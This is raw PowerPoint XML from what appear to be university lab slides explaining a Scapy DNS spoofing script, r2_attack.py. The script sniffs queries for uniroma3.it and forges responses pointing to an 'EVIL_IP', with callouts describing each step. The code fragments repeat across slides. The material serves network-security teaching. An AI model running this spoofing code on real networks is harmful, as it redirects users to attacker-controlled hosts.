            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</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dns_spoof</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pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and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 DNS_UNI_IP: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[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</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t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </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ether_layer</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ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</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udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=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[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport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dport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[UDP].sport)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dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</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[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{615DB5CF-A24F-4F5D-2C29-9312867C63F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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2F3F4977-DD65-1914-9CE9-01609B8077F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9101BFAA-40C6-95B8-95E3-3B7E8B68FD5F}"/>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5273B125-C1DC-EA5C-C06C-9C3FD6A52523}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1189B70-F73A-DB1F-C31D-0CB89E76B7D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="209550" y="2115362"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31106"/>
              <a:gd name="adj2" fmla="val 186854"/>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check if the packet contains a DNS query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5397DEDD-EEE1-DFC2-DC2A-E7DEC48DE342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4160887" y="1865579"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37"/>
              <a:gd name="adj2" fmla="val 21111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make sure it's a request and not a response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825849F6-24FA-35CE-7331-4CE3FF12049E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8090857" y="1740400"/>
            <a:ext cx="3470176" cy="950585"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35284"/>
              <a:gd name="adj2" fmla="val 15373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verify that the request is directed to the university's DNS server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BB24DF-549B-E103-5F46-566FFF3E5635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8090857" y="4167016"/>
            <a:ext cx="3956558" cy="1246421"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -95711"/>
              <a:gd name="adj2" fmla="val -5311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Extracts the searched domain name (e.g. www.uniroma3.it.) from the binary packet and converts it into a readable string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB84A28-6787-9924-3718-E6EAC17654C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="431593" y="5056749"/>
            <a:ext cx="3956558" cy="1246421"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -7169"/>
              <a:gd name="adj2" fmla="val -9789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If the domain searched by the user is the one we want to hit, we proceed with the creation of the "poison"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1915468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95D52-E7D9-7E45-F6A2-F019DB37F86D}"/>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837FB979-6BE4-7A2A-14A2-CA5A90E69B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD7AB44D-009B-F1FD-09E1-BF36839DC21D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </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sendp</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EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</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dns_spoof</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pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and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 DNS_UNI_IP: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[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</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t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </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ether_layer</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ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</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udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=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[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport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dport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[UDP].sport)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dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</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[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E061DB8-734C-E89C-6DAA-7492DD607A78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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88794D37-BF02-CFBE-02FA-408AACA87225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D90B9B-0B5D-C960-6D84-65B253F22766}"/>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D102C6C5-98F2-23F0-A3BE-630F4CF88B1E}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C5579B-BD6B-7558-0B2B-422C343B81B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="150173" y="1909973"/>
            <a:ext cx="5134346" cy="1007972"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9635"/>
              <a:gd name="adj2" fmla="val 21721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creates Ethernet header, Reverses MAC addresses: the destination of the fake packet will be the source of the captured one</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDE81B1-E184-28D9-342F-8F9291B3502D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5088330" y="5611906"/>
            <a:ext cx="5385706" cy="1007972"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75477"/>
              <a:gd name="adj2" fmla="val -99703"/>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Create the IP header. This is where the attacker "steals" the server's identity: the source IP of the response will be the IP of the real DNS server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345311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67863-B02C-706C-5444-1292AE687B42}"/>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E7977412-38C2-7FE7-855D-3EAB6D6536AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30C501C1-9456-8B25-FC54-6F86D5FE5F0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </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sendp</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EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
